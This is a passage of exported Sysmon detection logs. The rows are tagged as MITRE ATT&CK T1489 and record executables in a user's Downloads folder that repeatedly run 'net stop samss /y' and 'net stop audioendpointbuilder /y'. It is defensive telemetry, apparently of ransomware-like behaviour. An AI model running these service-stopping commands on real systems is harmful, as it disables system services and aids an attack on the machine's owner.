MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.149"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-001089994000}"",""processId"":""290508"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:19.253",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:57.690 +ProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e8ae3f00} +ProcessId: 277220 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00} +ParentProcessId: 275576 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:57.757107000Z"",""eventRecordID"":""1270"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:57.690\r\nProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e8ae3f00}\r\nProcessId: 277220\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00}\r\nParentProcessId: 275576\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:57.690"",""processGuid"":""{df9fc3d3-d231-5ec7-0000-0010e8ae3f00}"",""processId"":""277220"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d230-5ec7-0000-0010b3963f00}"",""parentProcessId"":""275576"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.017",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:57.205 +ProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e19e3f00} +ProcessId: 276348 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00} +ParentProcessId: 275408 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:57.209559700Z"",""eventRecordID"":""1234"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:57.205\r\nProcessGuid: {df9fc3d3-d231-5ec7-0000-0010e19e3f00}\r\nProcessId: 276348\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00}\r\nParentProcessId: 275408\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:57.205"",""processGuid"":""{df9fc3d3-d231-5ec7-0000-0010e19e3f00}"",""processId"":""276348"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d230-5ec7-0000-001079923f00}"",""parentProcessId"":""275408"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.008",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:56.885 +ProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00} +ProcessId: 275576 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:56.897986900Z"",""eventRecordID"":""1233"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:56.885\r\nProcessGuid: {df9fc3d3-d230-5ec7-0000-0010b3963f00}\r\nProcessId: 275576\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:56.885"",""processGuid"":""{df9fc3d3-d230-5ec7-0000-0010b3963f00}"",""processId"":""275576"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:19.002",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:56.667 +ProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00} +ProcessId: 275408 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: 
net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:56.680196600Z"",""eventRecordID"":""1232"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:56.667\r\nProcessGuid: {df9fc3d3-d230-5ec7-0000-001079923f00}\r\nProcessId: 275408\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:56.667"",""processGuid"":""{df9fc3d3-d230-5ec7-0000-001079923f00}"",""processId"":""275408"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:18.983",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:54.798 +ProcessGuid: {df9fc3d3-d22e-5ec7-0000-0010346a3f00} +ProcessId: 272192 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00} +ParentProcessId: 269684 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:54.926710200Z"",""eventRecordID"":""1231"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:54.798\r\nProcessGuid: {df9fc3d3-d22e-5ec7-0000-0010346a3f00}\r\nProcessId: 272192\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00}\r\nParentProcessId: 269684\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:54.798"",""processGuid"":""{df9fc3d3-d22e-5ec7-0000-0010346a3f00}"",""processId"":""272192"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d22a-5ec7-0000-0010e43f3f00}"",""parentProcessId"":""269684"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:18.967",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:53.005 +ProcessGuid: {df9fc3d3-d22d-5ec7-0000-00107f5a3f00} +ProcessId: 270600 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00} +ParentProcessId: 269020 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:53.150352700Z"",""eventRecordID"":""1230"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:53.005\r\nProcessGuid: {df9fc3d3-d22d-5ec7-0000-00107f5a3f00}\r\nProcessId: 270600\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d22a-5ec7-0000-001090363f00}\r\nParentProcessId: 269020\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:53.005"",""processGuid"":""{df9fc3d3-d22d-5ec7-0000-00107f5a3f00}"",""processId"":""270600"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d22a-5ec7-0000-001090363f00}"",""parentProcessId"":""269020"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:18.686",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:50.728 +ProcessGuid: {df9fc3d3-d22a-5ec7-0000-0010e43f3f00} +ProcessId: 269684 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
